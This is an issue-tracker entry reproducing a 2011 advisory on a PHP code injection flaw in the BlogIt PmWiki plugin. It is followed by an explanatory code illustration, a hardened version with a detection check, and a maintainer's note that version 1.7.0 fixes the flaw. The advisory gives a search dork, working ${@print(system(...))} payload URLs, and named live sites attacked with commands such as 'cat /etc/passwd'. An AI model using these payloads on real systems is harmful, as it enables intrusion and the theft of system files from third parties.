01258: Vulnerability in BlogIt 1.6.0

Summary: Vulnerability in BlogIt 1.6.0
Created: 2011-07-03 14:50
Status: Closed
Category: Cookbook
Assigned:
Priority: 5
Version: <= 1.6.0
OS: not applicable

Description:

===================================================================
BlogIt <= 1.6.0 PHP Code Injection Vulnerability
===================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Ux0r
#[+] E-mail          : ux0r@live.com
#[+] Home            : http://ux0r.blogspot.com ~ http://mavi1.org
#[+] Message         : Greetings to the lamers who keep trying to overwrite my old indexes. You made me laugh :)

Product : BlogIt
Version : <= 1.6.0
Site    : http://www.pmwiki.org/wiki/Cookbook/BlogIt
Dork    : "powered by blogIt"


 = Error in file Site.BlogList =

Error code: (Line 11)

text=(:includesection "#blog-yearly-archive-pagelist blogid={(bi_ifnull '{$bi_BlogId}' blog1)} status=publish,sticky":)

Vulnerable parameter: $bi_BlogId


 = Exploit =

- http://site.com/path/Site/BlogList?blogid=${@print(...)}  ; ... => PHP code injection


 = Example =

- http://site.com/Site/BlogList?blogid=${@print(system('ls -la'))}

 = Live examples =

- http://schniertshauer.com/Site/BlogList?blogid=${@print(system('ls -la'))}
- http://dotdelimited.com/Site/BlogList?blogid=${@print(system('pwd'))}
- http://tognela.net/Site/BlogList?blogid=${@print(system('cat /etc/passwd'))}

 < Best wishes. 2011 >
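As an added illustration (not code from BlogIt, PmWiki, or the advisory's author), the hypothetical reduction below shows the PHP bug class that a `${@print(...)}` payload exploits: attacker text spliced into PHP source that is then evaluated, so that PHP's `${expr}` string-interpolation syntax runs `expr` as code. The template, the id grammar in the hardened version and the sample inputs are constructed for this example; nothing here is claimed to be BlogIt's actual code.

```php
<?php
// Added illustration, not BlogIt's or PmWiki's code: a hypothetical reduction of
// the PHP bug class that a "${@print(...)}" payload exploits. When attacker text
// is spliced into PHP source that is later run through eval() (or, historically,
// preg_replace() with the /e modifier), PHP's "${expr}" interpolation inside a
// double-quoted string evaluates expr as code. PHP 8.2 deprecates this syntax
// but still executes it.

// Vulnerable pattern: user-controlled $blogid becomes part of evaluated source.
function render_vulnerable(string $blogid): string
{
    // Constructed template; nothing in BlogIt is claimed to look like this.
    $source = 'return "Archive for blog ' . $blogid . '";';
    // With $blogid = ${@print('code ran')} the evaluated source is
    //   return "Archive for blog ${@print('code ran')}";
    // and the print() call executes while the string is being built.
    return (string) eval($source);
}

// Hardened pattern: the value is validated as data and never becomes source.
function render_hardened(string $blogid): string
{
    // Assumed id grammar; 'blog1' mirrors the page's bi_ifnull fallback.
    if (preg_match('/^[A-Za-z0-9_-]{1,64}$/', $blogid) !== 1) {
        $blogid = 'blog1';
    }
    return 'Archive for blog ' . htmlspecialchars($blogid, ENT_QUOTES, 'UTF-8');
}

// Request-level check a reviewer or a WAF rule could apply: a legitimate id
// never contains the "${" that opens PHP's interpolation syntax.
function looks_like_interpolation_injection(string $value): bool
{
    return strpos($value, '${') !== false;
}

// Constructed inputs (not taken from any live site): the advisory's payload
// shape with a harmless expression, and an ordinary id.
$payload = "\${@print('code ran')}";
$normal  = 'blog1';

var_dump(looks_like_interpolation_injection($payload));
var_dump(looks_like_interpolation_injection($normal));

echo render_hardened($payload), "\n";
echo render_vulnerable($payload), "\n";
```

Run with `php example.php`: the check flags the payload and not the plain id, the hardened renderer falls back to `blog1` without evaluating anything, and the vulnerable renderer executes the embedded `print()` (with an undefined-variable warning for the `${1}` lookup that follows) before returning its text. The fix is the same whatever the template engine: never let request data become source text, and constrain an identifier to the characters it legitimately needs.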

DaveG 4-Jul-2011: This issue was resolved in BlogIt version 1.7.0. Please upgrade immediately.